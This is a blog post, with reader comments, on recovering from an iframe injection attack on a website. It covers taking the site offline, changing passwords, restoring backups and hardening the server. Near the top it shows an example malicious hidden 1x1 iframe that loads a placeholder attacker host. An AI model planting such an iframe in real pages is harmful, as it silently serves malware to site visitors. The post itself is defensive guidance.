Troubleshooting an IFrame Injection Attack

IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. If you have recently got an iframe attack to your website, do not panic. Here are a few things that you can do immediately after you discovered that your website has been a victim of an iframe injection attack.

<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
An example of a malicious IFRAME injection code

1. Take your website down for a certain period
It is recommended to take the website down as you do not want to be distributing malware or virus from your website to your visitors. The website should be offline while you are recovering the site.

2. Change all the passwords
Although this may seem like a simple step, many people, including myself, often fail to change all the passwords immediately after an attack has been discovered. You need to change all the passwords associated with the website; which include ftp passwords, ssh passwords, account passwords, database passwords, admin passwords and so on.

3. Take a copy of the affected website for further analysis
You may want to do a further analysis on the attack and might need to refer to the exact injection source code in the future. Take a copy of the affected website in a compressed format, eg: zip or gzip and store it in an quarantine area for later reference. Note that it is not advisable to keep the affected files on the server.

4. Replace the entire site with a clean backup copy
Do not rely on your hosting provider for a backup copy of your site. Many hosting providers say they do an automatic backup every night, however, it is more reliable if you have other backup solutions for your website. Scan your backup copy with Anti-Virus software like ZoneAlarm or Trend Micro (use cupon code trendpro to get 10% Off Trend Micro Internet Security Pro 2010) before uploading to the web server to ensure that the backup copy is free from viruses and Trojan horses.

5. Test the website and reopen
This is to make sure that the website is reverted to its clean, original version. Once you are happy with the result, you can reopen the website to the public.

6. Analyse how the attack was originated
In order to ensure that the same attack does not happen again, you will need to do a full analysis of the attack and how it was originated. Was it because of a security hole in your application? Was it caused by a weak file permission? Or is your server affected with some virus that injects these code into your website at regular interval? You will need to understand how it happens in order to prevent it in the future. And when necessary, obtain an expert advice.

7. Perform appropriate security measures based on the analysis
Although you may have recovered your website, it does not mean your website will not be attacked again. If the same security hole still exists, it is probably very likely that the website will be attacked again in the near future. Therefore, it is recommended that you perform necessary security measures, be it hardening your web server, upgrading an application, or introducing new security restrictions.

My experience and advice

I have encountered and recovered quite a few websites that had been attacked by malicious iframe exploit in the recent years. And the common causes seem to be as follows:

  • The website is hosted on a cheap web hosting service
  • The website is using an old version of an open source application (eg: WordPress 1.0) which has known security issues
  • File permissions on the server are not set accordingly (eg: every file and folder on the server is set to 777 – read-write-execute)
  • Weakness in an application code. For example, there is not sufficient input validation.
  • FTP rather than SFTP is used
  • There is no IP restriction for SSH and FTP accounts

There are a few simple things that can be done to reduce the risk of your website being attacked.

  • Change your passwords periodically (say, at least once a month)
  • Keep your applications up-to-date. Always upgrade immediately when a new version is available.
  • Clean up files and directories on the web server. Make sure there is no old file with .bak or .txt extensions lying around
  • Ensure that appropriate file permissions are used for every file and directory on the web server
  • Consult with a security expert to obtain the best advice

11 thoughts on “Troubleshooting an IFrame Injection Attack

  1. I’ve had the same problem on my test server these last few weeks. Thankfully I have nightly backups. Anyway, after some research I thought it might be related to PHP’s register_globals setting. Turns out I was right. The damn setting was on.

    Now that I’ve cleared it, attacks have stopped. So you might wanna check if your host has left it on in php.ini. If you can’t edit your php.ini file, just add “php_flag register_globals off” at the top of your root .htaccess file.

    Cheers :)

    Akash

  2. I was facing the same problem from April.
    Even now I dont know how to rectify it, I have used 20 Jquery files for usability and effects for my website.

    I am searching for, still no permanent requiry.

    If anybody want to help me on this issue pls…

    Thanks
    Mahes

  3. my website was attacked with this too

    I had a back up so restored it, but what I didnt realise that I had back up with the i-frame injection, my website was on for an hour and then it was down again, did AV scan with Avast on the back up files and found the i-frame virus, deleted it, did a full scan on my pc and now I can get my website on, but even tho I will change the passwords and everthing I think this can still be a dangerous one cos if a visitor of your website has the same virus , they can easily infect you with it without knowing they had the virus, it can actualy be siiting on his website ready to fire if you have visited such website or have been redirected to it somehow, one of those is the Firefox pop ups, never accept anything pops up unless you have set it to do so, and if you do by mistake then you get redirected to the infected website and get infected yourself, and now you are the virus who goes and visits the websites and infect all which has no strong wall and with lots of ports open, one of the main and easy security on Firefox you should have is the “KeyScambler” anything you type becomes encrypted text, and not good for all but most is the AddBlock Plus which which is an add on for Firefox, this stops any link that you filter, so it may come handy for blocking lots of ads and stops you being directed to visit an infected site so that can infect you, these are my little suggestions to get more security on your pc and your webserver, and make sure you learn all about what file permission settings are all about, that will also give you some extra security.

    all this information I gained through searches and trials and from my silly thinking that I had enough security set up, obviously not !, my only hope is that we never give up and fight back with these issues and help and share information with each other than hopefuly your wont be the next victim ! …

  4. For .net just add the following in the web.config file

    This will prevent scripting attacks.

  5. Looks like this site has removed my coding :-) to prevent scripting attacks :-)

    So in the web.config file, under system.web, just set the property validateRequest of the pages tag to TRUE.

  6. I have encountered the same problem.. good thing i have restored the site. But I was wondering what might have caused this kind of injection? Is my computer infected with a virus, is the server has the virus, or something..??

  7. Grab a copy of Upload Guardian for your VPS/dedicated server. It scans FTP/PHP uploads in real-time and blocks the attacking IP in the firewall.

Comments are closed.